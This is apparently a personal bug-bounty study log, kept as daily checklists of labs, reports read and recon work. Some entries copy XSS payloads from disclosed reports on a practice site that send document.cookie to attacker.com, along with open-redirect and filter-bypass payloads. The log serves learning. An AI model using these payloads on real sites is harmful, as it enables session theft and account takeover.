i create this repo inspired by @AnubhavSingh_(https://github.com/anubhavsinghhacker) and @vish_hal(https://github.com/vish-hal/) bhai, what i do everyday i will update daily on my github repo.
Date - 28/11/2021
-
#solve tryhackme room
- (1 tyrhackme room solve - john) ✅
-
#read zseano print book (Toady Read Page-No 11)✅ Time - 7:24
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day ✅
- https://blog.intigriti.com/2021/11/17/bug-bytes-147-from-wont-fix-to-100k-bounties-http-header-smuggling-chaosdb/?utm_source=newsletter&utm_medium=email&utm_campaign=bug_bytes_147_from_wont_fix_to_100k_bounties_http_header_smuggling_chaosdb&utm_term=2021-11-28
- (Http Request Sumggling, and Awesome Videos)
-
#try to read payload artirst weekly blog ✅ Time 10:00 - 10:24
- http://news.bugbountyhunting.com/issues/predictable-mongodb-ids-rce-through-race-conditions-and-more-878246
- Account Takeover using insecure deep-link
- Security Tools
- ParamsExtractor - > Burp extension
- cookiemonster
- http://news.bugbountyhunting.com/issues/predictable-mongodb-ids-rce-through-race-conditions-and-more-878246
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking" ✅ Time - 7:24 - 8:36 (try to random thing ja amer mathay as6ilo)
-
#read disclosed report ✅
- https://hackerone.com/reports/751299
- https://infosecwriteups.com/how-inspect-element-got-me-a-bounty-58d3a9946225
- https://sm4rty.medium.com/hunting-for-bugs-in-shopping-billing-feature-79055d5f399b (i don't understand very well this writeup )
- https://infosecwriteups.com/sony-hunting-i-discovering-hidden-parameters-5x-swag-c3396c0064bc
-
# Today Dheeraj sir task is
- learn what is lighthouse ✅
- learn prototype polution
Date - 29/11/2021
-
#solve tryhackme room - (1 TryHackMe room solve) ✅ 8:50 - 11:48
-
#read zseano print book
-
#read firstblood1/2 Disclosed report ✅ 11:48 - 12:48 | 1:50 - 2:20
- https://www.bugbountyhunter.com/hackevents/report?id=722 (Stored Xss)
- https://www.bugbountyhunter.com/hackevents/report?id=712 (Sql-injection)
- https://www.bugbountyhunter.com/hackevents/report?id=417 (Un-Authorized users can access "/drpanel/drapi/qp.php" endpoint )
- https://www.bugbountyhunter.com/hackevents/report?id=674 (admin account takeover via stored xss)
- https://www.bugbountyhunter.com/hackevents/report?id=679 (Cancelled appointments are still accessible through /manageappointment.php endpoint)
- https://www.bugbountyhunter.com/hackevents/report?id=104 (New doctors can query appointments and users informations using vulnerable /drpanel/drapi/query.php endpoint / quarry parameter "aptid={aptid}")
- https://www.bugbountyhunter.com/hackevents/report?id=177 (New doctors can query appointments and users information using /drpanel/drapi/qp.php endpoint / another / admin concept)
-
#want to create some usefull tool (if possible) ✅ 6:00 - 12:00
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking" ✅
- 12:48 - 1:15
-
#doing some recon on censys ✅ 6:00 - 10:48
-
#doing some recon on shodan ✅ 9:00 - 10:48 | 11:30 - 12:00
-
#read disclosed report
-
# Today Dheeraj sir task is
- learn what is lighthouse ✅ (Task compelete yesterday)
- learn prototype polution
Date - 30/11/2021
-
#solve tryhackme room
-
#read zseano print book ✅ page - 12-17 / 8:30 - 9:17
-
#read firstblood1/2 Disclosed report ✅
- https://www.bugbountyhunter.com/hackevents/report?id=145 (Patient's can modify their information without authorization on "/manageappointment.php" endpoint) (doctor cookie)
- https://www.bugbountyhunter.com/hackevents/report?id=176 ( Emails and comments of other users can be changed using IDOR on aptID)
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#doing some recon on shodan ✅ 9:30 - 12:20
-
#doing some recon on censys
-
#read disclosed report
-
# Today Dheeraj sir task is
- learn what is lighthouse ✅ (compelete Date - 28/11/2021)
- learn prototype polution ✅
- watch 35 minit 9:00 - 11:00
Date - 1/12/2021
- solve tryhackme room
- read zseano print book
- read firstblood1/2 Disclosed report
- want to create some usefull tool (if possible) ✅ 9:00 - 3:40 / 9:30 - 12:40 - creating shodan automaion
- try to do some manual recon on BugBounty program / JS recon
- leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- try to read 1 intrigity-blog Bug-Bytes per day
- try to read payload artirst weekly blog
- try to read anurag sr news latter
- try to daily hunt on "fastfoodhacking"
- read disclosed report
Date - 2/11/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible) ✅
- Build some useful droks 9:00 - 1:00 | 5:38 - 1:20
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅
- apache - > server-status
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 3/11/2021
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible) ✅
- solve i "sleep" cmd problem ✅ 8:16 - 9:41 | 9:41 AM - 7:30
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 4/11/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report ✅
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 5/11/2021
-
#solve tryhackme room ✅
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 6/11/2021
- #solve tryhackme room ✅ 11:38 - 1:00
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible) ✅
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 7/11/2021
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report ✅
- https://www.bugbountyhunter.com/hackevents/report?id=717
- https://www.bugbountyhunter.com/hackevents/report?id=47 (open redirect payload - "//" )-(holybugx)
- https://www.bugbountyhunter.com/hackevents/report?id=586 (open redirect using Tab URL Encoding )-(holybugx)
- https://www.bugbountyhunter.com/hackevents/report?id=918 (same report but new is using "curl")-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=386 (Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=566 (Any user can update admin's password | same as - /drpanel/drapi/editpassword.php)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=475 ( [COLLAB] RCE via insecure deserialization in /api/checkproof.php endpoint) (panya report)
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 8/11/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report ✅
- https://www.bugbountyhunter.com/hackevents/report?id=692 (Becoming a root on the server)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=418 (Email of an appointment could be modified if cookie doctorAuthed is)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=893 (Information about used dependencies is leaked via /vendor/composer/installed.json)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=357 (Open redirect via ref parameter on /drpanel/logout.php endpoint)-(panya | same as holybugx)
- https://www.bugbountyhunter.com/hackevents/report?id=308 (Reflective XSS on login.php via goto parameter)-(panya)
- https://www.bugbountyhunter.com/hackevents/report?id=343 ( Reflective XSS on login.php via goto parameter after successful login)-(panya) (report not so good)
- https://www.bugbountyhunter.com/hackevents/report?id=154 (Reflective XSS on /login.php endpoint through the vulnerable
refparameter)-(holybugx) (quality report) 👌🏻 (bypass for xss are awesome)
Bypasses
- ja%09vascript
- ja%0avascript
- ja%0dvascript
- http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
- http://firstbloodhackers.com/login.php?ref=ja vascript:window.location.href=`http://attacker.com/${document.cookie}`
- %09 -> Tab
- %60 -> `
- %7B - > {
- %7D - }
- %60 -> `
-
#want to create some usefull tool (if possible) ✅
-
#try to do some manual recon on BugBounty program / JS recon ✅
- www.bugbountytranning.com (recon challenge)
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 9/11/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report ✅
- #want to create some usefull tool (if possible) ✅
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 10/11/2021
- solve tryhackme room
- read zseano print book
- read firstblood1/2 Disclosed report
- want to create some usefull tool (if possible) ✅ 8:49 - 1:00
- careating nuclei tamplates for hardcoded scanning.
- try to do some manual recon on BugBounty program / JS recon
- leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- try to read 1 intrigity-blog Bug-Bytes per day
- try to read payload artirst weekly blog
- try to read anurag sr news latter
- try to daily hunt on "fastfoodhacking"
- read disclosed report
Date - 11/12/2021
- solve tryhackme room ✅ - answer 1 question. 😒
- read zseano print book
- read firstblood1/2 Disclosed report
- want to create some usefull tool (if possible) ✅
- careating nuclei tamplates for hardcoded scanning.
- public my tool on github. 😍
- create private project "android nuclei tamplates"
- try to do some manual recon on BugBounty program / JS recon
- leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- try to read 1 intrigity-blog Bug-Bytes per day
- try to read payload artirst weekly blog
- try to read anurag sr news latter
- try to daily hunt on "fastfoodhacking"
- read disclosed report
Date - 12/12/2021
-
#solve tryhackme room ✅ 8:00AM - 12:00PM
- https://tryhackme.com/room/introtoshells
- https://tryhackme.com/room/commonlinuxprivesc | 12:00PM - 1:09PM | Task 4 Compelete | Compeleted On 10:18PM
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible) ✅
- create 100DaysofLearning GitHub project and update all Daily Checklist. 5:00AM - 7:00AM
- working android nuclei for hardcoded scan. | 6:00PM - 7:00PM | 11:30PM - 1:28PM
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 13/12/2021
-
#solve tryhackme room ✅
-
- answer 1 question. 😒
-
-
#read zseano print book
-
#read firstblood1/2 Disclosed report ✅
-
https://www.bugbountyhunter.com/hackevents/report?id=465 | 9:00AM - 10:35AM | (Reflected XSS on /login.php through the "goto" parameter leading to ATO)-(holybugx)-(quality report) 👌🏻
GET /login.php?goto=holy \_reflected-value on source code \_<input name="goto" value="holy" type="hidden"> GET /login.php?goto=holy<"'> \_reflected-value on source code \_<input name="goto" value="holy<"'> --> input tag is closed " type="hidden"> My thought we can also do like this: ------------------------------------ holy<"'> -> holy"<' > (i dont know it can't be) autofocus meanings: ------------------- The autofocus attribute is a boolean attribute. When present, it specifies that the element should automatically get focus when the page loads. onfocusin: ---------- Execute a JavaScript when an input field is about to get focus. Payload: ------- https://firstbloodhackers.com/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://Attacker.com/?${document.cookie}`%22%3E Ultimate Payload: ----------------- XSS payload are awesome. when the value is reflected in source-code and using "autofocus" the input field automatically get in focus and "onfocusin" listening for any upcoming focus then he execute the JavaScript and BOOM. <input name="goto" value="xyz" autofocus onfocusin="window.location.href=`http://Attacker.com/?${document.cookie}`">- https://www.bugbountyhunter.com/hackevents/report?id=479 ( Reflected XSS on /login.php using "goto" parameter and javascript scheme)-(sceniro changed exploit "goto" parameter using "javascript Schema")-(holybugx)-(quality report) 👌🏻
-
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅
- learned something abount jquary
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking" ✅
- Found something intersting .
-
#read disclosed report ✅
Date - 14/12/2021
-
#solve tryhackme room ✅
- answer 1 question. 😒
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅
- learned something abount jquary (CVE-2020-11023)
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking" ✅
- found one bug.
- found one flag.
-
#read disclosed report
Date - 15/12/2021
Noting doing today.
Date - 16/12/2021
-
#solve tryhackme room ✅
- answerd some question
-
#read zseano print book
-
#read firstblood1/2 Disclosed report ✅
-
prrrevious read
-
https://www.bugbountyhunter.com/hackevents/report?id=586 (Open Redirect on logout.php endpoint [Bypass])-(holybugx)-(quality report)👌
- // -> are filterd, she using backsalash in the middle of forward-salash. Like - "//"
- //domain.com -> //domain.com
-
https://www.bugbountyhunter.com/hackevents/report?id=47 (Open redirect on the logout.php endpoint [COLLAB])-(holybugx)👌
- first // filterd and bypass are => "//attacker.com"
- Then devloper convert - "" to - '.'
- if attacker put this payload => //attacker.com OutPut Could be like - /./attacker.com
- for bypass this instead of using back-salash '' she use -> %09 Tab-Character
- ultimate pyload could be -> /%09/attacker.com
-
-
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon ✅
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report
Date - 17/12/2021
- #solve tryhackme room ✅
- answerd few question.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #revise network topic ✅
- Physical Layer
- Data-link Layer
- #read disclosed report ✅
- https://payatu.com/blog/prateek.thakare/broken-access-control
- https://hackerone.com/reports/414101 (Vulnerabilities in exported activity WebView)
- https://infosecwriteups.com/super-admin-panel-without-credentials-c2022a23bb35
Date - 18/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #revise network topic ✅
- Network Layer
- Transport Layer
- #read disclosed report ✅
Date - 19/12/2021
- #solve tryhackme room ✅
- one question only.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://medium.com/@thedarkwayg/how-i-found-my-first-xss-bug-96fb8e85a24c (open-redirect to reflected xss)
- https://infosecwriteups.com/accidental-bug-leads-to-google-honorable-mentions-7dad9eecbd7f (isko luck bolte hai)
- https://m7-arman.medium.com/zero-click-to-account-takeover-d764e12bee4b (Hacker Needs an Eagle-Eye)
- https://hackerone.com/reports/1379297 (reflected xss in e.mail.ru)
Date - 20/12/2021
- #solve tryhackme room ✅
- one question only.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
-
https://infosecwriteups.com/an-interesting-account-takeover-3a33f42d609d (An Interesting Account Takeover!!) (vulnerability found on password reset-funcation)
- when user try reset passwd
- USER must enter a valid Profile-Id
- Then guy found "state" parameter (if Profile ID is valid)
- Then password reset link is sent to the Users registered E-mail.
- He check this token on CyberChef
- Token (789c0dc8610a80200c06d0bbec049bc9d26f870921834192a4ffa2bbd7fbf90a029e810c9adeea98a5753287a844e16555b1016150bfafc3cfbaf94eff2450e494a2e640f67ebc89137aade927d25a020ab2535ab4b5c9dc4fd1)
- decrypts back to (Encoded Mthods are - Zlib-deflated and Hex)
- “a:2:{s:9:”timestamp”;i:1614104013;s:10:”profile_id”;s:8:”40884692";}”
- he create another token
- Token
- 789c0dc8510a85201005d0bdcc0ac6f25da6eb62427806034992fe457bb7df93b9f0e9dc28c36be923d726c919107ec0aa40ea0c4a69f775f85976ffcb2746891a610693f44ebe171387
- Token
- he try cratf LINK (BUT link doesn't work) - (beacuse of token length)
- he asked question on reddit (he found some solution)
- what he found
- Zlib includes an ADLER32 checksum if you use the Adler-32_Checksum() function after inflating you get BC89137A,
- This is the first Token (where checksum is present)
- 789c0dc8610a80200c06d0bbec049bc9d26f870921834192a4ffa2bbd7fbf90a029e810c9adeea98a5753287a844e16555b1016150bfafc3cfbaf94eff2450e494a2e640f67ebc89137aade927d25a020ab2535ab4b5c9dc4fd1 (here you can find checksum)
- Secound Token
- 789c0dc8510a85201005d0bdcc0ac6f25da6eb62427806034992fe457bb7df93b9f0e9dc28c36be923d726c919107ec0aa40ea0c4a69f775f85976ffcb2746891a610693f44ebe171387 (there is no checksum)
- This is the first Token (where checksum is present)
- Zlib includes an ADLER32 checksum if you use the Adler-32_Checksum() function after inflating you get BC89137A,
- he also noticed that this checksum is presend in first token.
- what he found
- Now he solve length issue.
- Then he found some endpoint on JS file.
- He try Brute Force that endpoint (what is added after checksum she found)
- Then BOOM (:)
- USER must enter a valid Profile-Id
- when user try reset passwd
-
https://blog.0iq.me/ (realy awesome Writeup or Blog for BugBounty )
-
Date - 21/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://medium.com/@jawadmahdi/how-to-hunt-on-host-based-bug-bounty-program-f8f66a6c535b (How to hunt on HOST based Bug Bounty Program?)-(Given IP-Range)
- https://blog.pentesterlab.com/a-strategy-to-land-your-first-pentest-job-25209a351689 (Being good in one subject is better than average in everything.)
Date - 22/12/2021
- #solve tryhackme room ✅
- one question only.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
- #JS ENUMERATION ✅
Date - 23/12/2021
- #solve tryhackme room ✅
- one question only.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://youtu.be/yXCsarY4ecI ( ATO by password-reset-funcation lecture by - Thuin Bose )
- https://twitter.com/tuhin1729_/status/1437471718142976007?s=20
Date - 24/12/2021
- #solve tryhackme room ✅
- one question only.
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://hackerone.com/reports/92251 (Issue with password change)-(password reset link is not expired and user also not notified)
- https://hackerone.com/reports/38343(Issue with password change)-(user not notified)
- https://hackerone.com/reports/315512(No security impact ) 🤷♂️
- https://hackerone.com/reports/809 (Not understand well)
Date - 25/12/2021
(Today i am doing nothing beacuse tommorrow my second vacine was completed and i am feeling pain in my brain today.)
Date - 26/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- find lots of this and extra.
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 27/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- attacking jwt token
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 28/12/2021
- #solve tryhackme room
- #read zseano print book (Toady Read Page-No 18 - 20 )✅ Time - 8:30 10:20
- #read Bug Bounty Bootcamp by ( vickie li) ✅
- chapter one (page 1-3)
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible) ✅
- add some regexs my nuclei templete
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- Offensive Analysis of Android Application by @RajaNagori7 (Video - https://youtu.be/0BQIgzf9q-I)
Date - 29/12/2021
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report ✅
-
https://www.bugbountyhunter.com/hackevents/report?id=273 (Reflected XSS on /login.php using the GET paramter 'goto')-(Payload are awesome)
- Payload: iffu"><scr<script>ipt>confirm
1</scr</script>ipt><" - 👌- <script> Tag are filtered that why he putting payload - ipt> - when middle script is removed that become another "script" Tag. - https://stackoverflow.com/questions/1474185/what-does-this-mean-document-writescript (this is another example)
- Payload: iffu"><scr<script>ipt>confirm
-
https://www.bugbountyhunter.com/hackevents/report?id=120 (Stored XSS on /drpanel/drapi/query.php?aptid)
-
https://www.bugbountyhunter.com/hackevents/report?id=126 ( Open Redirect /drpanel/logout.php)
- Payload: //www.evil.com
-
https://www.bugbountyhunter.com/hackevents/report?id=258 (Reflected XSS on /login.php using ref parameter)
- Payload: j%0aava%0ascr%0aipt:onerror=prompt;throw%20document.cookie - 👌
-
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#watch ansh sir video ✅
- 15-31-owasp-top-10-introduction-to-cross-site-scripting
-
#read disclosed report
Date - 30/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible) ✅
- check every regex in my nuclei work properly or not .
- checking is completed.
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 31/12/2021
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible) ✅
- i am create small bash script and etc i will tell in future.
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
- #watching dheeraj sir video on pentester academy video ✅
- https://youtu.be/ZMSX0vCsLOY (Karma_v2 or 403bypass)
Date - 1/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 2/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
- #learn python ✅
Date - 3/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 4/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- password reset poisen by AnugrahSR(https://twitter.com/cyph3r_asr) - YouTube(https://youtu.be/JTrXOS8N9W0)
- #watch dheeraj sir seassion [Cli Compromise detect] ✅
- #learn python ✅
- using python how to make Http Request.
- using different method.
Date - 5/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
